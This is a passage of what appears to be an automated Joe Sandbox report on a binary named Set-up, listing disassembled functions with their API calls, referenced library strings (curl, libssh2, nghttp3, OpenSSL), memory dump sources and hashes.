                            • Opcode ID: 966a8cc70c682ab617a1016494bc154413001fc887a107064211d7df14238dd1
                            • Instruction ID: af55e9347a39e1f185df5803cfae915f75b29efba0b9f79e0584f1c244406aa5
                            • Opcode Fuzzy Hash: 966a8cc70c682ab617a1016494bc154413001fc887a107064211d7df14238dd1
                            • Instruction Fuzzy Hash: B8D1D5F2E443056BE6217A60AD43F7F76EC9FD4754F044928FA4CA6183FA61E90487A3
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 008EC60E
                            Strings
                            • Unable to send FXP_OPEN*, xrefs: 008EC45B
                            • Too small FXP_HANDLE, xrefs: 008EC582, 008EC675
                            • Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 008EC444
                            • Unable to allocate new SFTP handle structure, xrefs: 008EC646
                            • Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 008EC410
                            • Failed opening remote file, xrefs: 008EC531
                            • Too small FXP_STATUS, xrefs: 008EC517
                            • Timeout waiting for status message, xrefs: 008EC4FB
                            • feWould block waiting for status message, xrefs: 008EC4A6
                            • Response too small, xrefs: 008EC4E3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
                            • API String ID: 3510742995-1499184223
                            • Opcode ID: d6e5786b3b2c45e2bb3252e68cadcd6efb14e546f880c2071989babb68a666aa
                            • Instruction ID: ad5925a1a8a2bf8c9ff9b5a7e98e92478d3017f87eadee7fa7d6f91cfd1e5a52
                            • Opcode Fuzzy Hash: d6e5786b3b2c45e2bb3252e68cadcd6efb14e546f880c2071989babb68a666aa
                            • Instruction Fuzzy Hash: 97B1F2B09047819FDB10CF29DC51A6BB7A4FF96318F044A2CF856D6292E770D919CBA2
                            APIs
                            • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,0084CC57), ref: 0084F028
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strrchr
                            • String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
                            • API String ID: 3418686817-2910492138
                            • Opcode ID: c1121f5d8f6664fac85b133d82b5036d96a0d9d92e74168d7df11485bee33309
                            • Instruction ID: a9b73180cb5668f5ce4d3e47c0dc4f51487686ac3c31d9b7eb047e3d1f07fc91
                            • Opcode Fuzzy Hash: c1121f5d8f6664fac85b133d82b5036d96a0d9d92e74168d7df11485bee33309
                            • Instruction Fuzzy Hash: B8A1347170434CABE7299A589C05BB77789FB91308F08407DEA48DB283E3B6DD45C7A2
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 008AA9E8
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,008A71B7,00000001,?,?), ref: 008AAA04
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,008A71B7,00000001,?,?), ref: 008AAA19
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,008A71B7,00000001,?,?), ref: 008AAA2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert$memcpy
                            • String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
                            • API String ID: 3718630003-2514804127
                            • Opcode ID: 635258d80873b1acd48f43e8907956cd31b61c7648dd4c34ac2db1360cefb6f0
                            • Instruction ID: cd8ad100debc160f89376e9497524d95b7fb6c016d63080bba3234bbfe38e400
                            • Opcode Fuzzy Hash: 635258d80873b1acd48f43e8907956cd31b61c7648dd4c34ac2db1360cefb6f0
                            • Instruction Fuzzy Hash: 6441CF71104304DFEB04DF15CD84F5A7BA4FF55309F1A049DE4899BAA2D731E849CB62
                            APIs
                            • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00A4238F
                            • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00A423C4
                            • GetLastError.KERNEL32 ref: 00A42433
                              • Part of subcall function 00A42240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00A3F763,?,?,?,?,?), ref: 00A42251
                              • Part of subcall function 00A42240: WideCharToMultiByte.KERNEL32 ref: 00A42284
                              • Part of subcall function 00A42240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00A422BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
                            • String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
                            • API String ID: 3049598375-4146664032
                            • Opcode ID: 21e22f69f968a1d1c32735fe8707849d4642fd56530a96e0ed40ef694a8cfe47
                            • Instruction ID: a5fad947ea96fc91e7511c9779d8ff8adcbe7bcf7689ab3d56873be8c376cf8d
                            • Opcode Fuzzy Hash: 21e22f69f968a1d1c32735fe8707849d4642fd56530a96e0ed40ef694a8cfe47
                            • Instruction Fuzzy Hash: F921AE69B803007FE6203BA5BC57F3B3A5CCBC5B06F004134FA08692D3E6959A1C87B2
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 009E49A8
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 009E4D44
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?), ref: 009E4E33
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy$strcpystrlen
                            • String ID: No password method specified$Prompt info data type incorrect$crypto/passphrase.c$do_ui_passphrase$info$ossl_pw_get_passphrase$pass phrase
                            • API String ID: 699153967-1272933286
                            • Opcode ID: 3394414f7959c47634ef1efc587f07baf4fe3ba6bb794de4a3b2e95f1f3c693f
                            • Instruction ID: 078ede222c3aa990e0284ce473f28ff177f80c797999ac2aefecf5844a79723d
                            • Opcode Fuzzy Hash: 3394414f7959c47634ef1efc587f07baf4fe3ba6bb794de4a3b2e95f1f3c693f
                            • Instruction Fuzzy Hash: 97C13B78B483817FD7217F619D43F6BB698AFD0B04F084928FA44962C3E675EC548663
                            APIs
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0086491A
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0086497C
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 008649F1
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864ABB
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864B21
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864BCF
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864C33
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00864CDD
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00864D30
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memchr
                            • String ID: 0123456789
                            • API String ID: 3297308162-2793719750
                            • Opcode ID: a2a9c148b684350ae81e406980294198dbed0bc19dfd0e6758db5b552fa39d65
                            • Instruction ID: 4f0b58803e0913f8be451fc55b459867e4812a44af674449eeea32f74596b012
                            • Opcode Fuzzy Hash: a2a9c148b684350ae81e406980294198dbed0bc19dfd0e6758db5b552fa39d65
                            • Instruction Fuzzy Hash: C9B128611883A25BDB229A2484A0B7E7FC5EF53744F1E50ADDDC4CB3D3DA668E09C312
                            APIs
                              • Part of subcall function 009DB4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB4CA
                              • Part of subcall function 009DB4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB4D4
                              • Part of subcall function 009DB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,009E7667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB53B
                              • Part of subcall function 009DB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,009E7667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB5A1
                              • Part of subcall function 009DB4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB5B4
                              • Part of subcall function 009DB4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB648
                              • Part of subcall function 009DB4B0: WideCharToMultiByte.KERNEL32 ref: 009DB67F
                              • Part of subcall function 009DB4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(009E7667,?,?,00000000,00000000,00000000,?,009E7667,OPENSSL_MODULES), ref: 009DB504
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0096A1F0
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0096A20B
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 0096A25D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
                            • String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
                            • API String ID: 2744062652-2540125403
                            • Opcode ID: d799886ae02b8f96536518cdf3d5e5834a3c4b6083d6cd4c1e83f839c681d6a6
                            • Instruction ID: 400d18acc32df83eb0bb2ef0a39a31b0a24b2a633061e7c0f00a4c05959af09a
                            • Opcode Fuzzy Hash: d799886ae02b8f96536518cdf3d5e5834a3c4b6083d6cd4c1e83f839c681d6a6
                            • Instruction Fuzzy Hash: F45126E5A443446FE710BA24AC52B3B76D89FD0744F084438F889A7343FA65EC04DBA3
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0082284C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
                            • API String ID: 39653677-4104037097
                            • Opcode ID: 6c16494e7785280386a230ed311f19d5e3490245743342b989a11156bfbce49e
                            • Instruction ID: 8a89af3469dddfc5027104793d65a128dacb5c9d3920bdfd99dc361daa158e5b
                            • Opcode Fuzzy Hash: 6c16494e7785280386a230ed311f19d5e3490245743342b989a11156bfbce49e
                            • Instruction Fuzzy Hash: 2CA122706043647FEB249E18E845B7A7BD5FF81354F08447DE88ACB292E7329D91C792
                            APIs
                            • getpeername.WS2_32(?,?,00000080), ref: 0083A376
                            • WSAGetLastError.WS2_32 ref: 0083A380
                              • Part of subcall function 008078B0: closesocket.WS2_32(?), ref: 008078BB
                              • Part of subcall function 0083EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 0083EF6F
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A3D2
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A3D6
                            Strings
                            • ssrem inet_ntop() failed with errno %d: %s, xrefs: 0083A3F4
                            • cf-socket.c, xrefs: 0083A2E9
                            • accepted_set(sock=%d, remote=%s port=%d), xrefs: 0083A488
                            • getpeername() failed with errno %d: %s, xrefs: 0083A3A0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errno$ErrorLastclosesocketgetpeername
                            • String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                            • API String ID: 1501154218-2965463112
                            • Opcode ID: 6e0f4115130adc0fd3bb74422b4484787028ccf64756d1be20f18ac7ecf81fb7
                            • Instruction ID: 9e7f48a76e8fd4b52d1a39532647108f6cd97e44984c86b58767d7d298592e51
                            • Opcode Fuzzy Hash: 6e0f4115130adc0fd3bb74422b4484787028ccf64756d1be20f18ac7ecf81fb7
                            • Instruction Fuzzy Hash: 5151E571904744ABEB259F28CC45BE777A8FF81314F044528F99C97252EB32A989CBD3
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 008AA5FC
                            • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 008AA698
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 008AA6BF
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 008AA6EB
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 008AA700
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
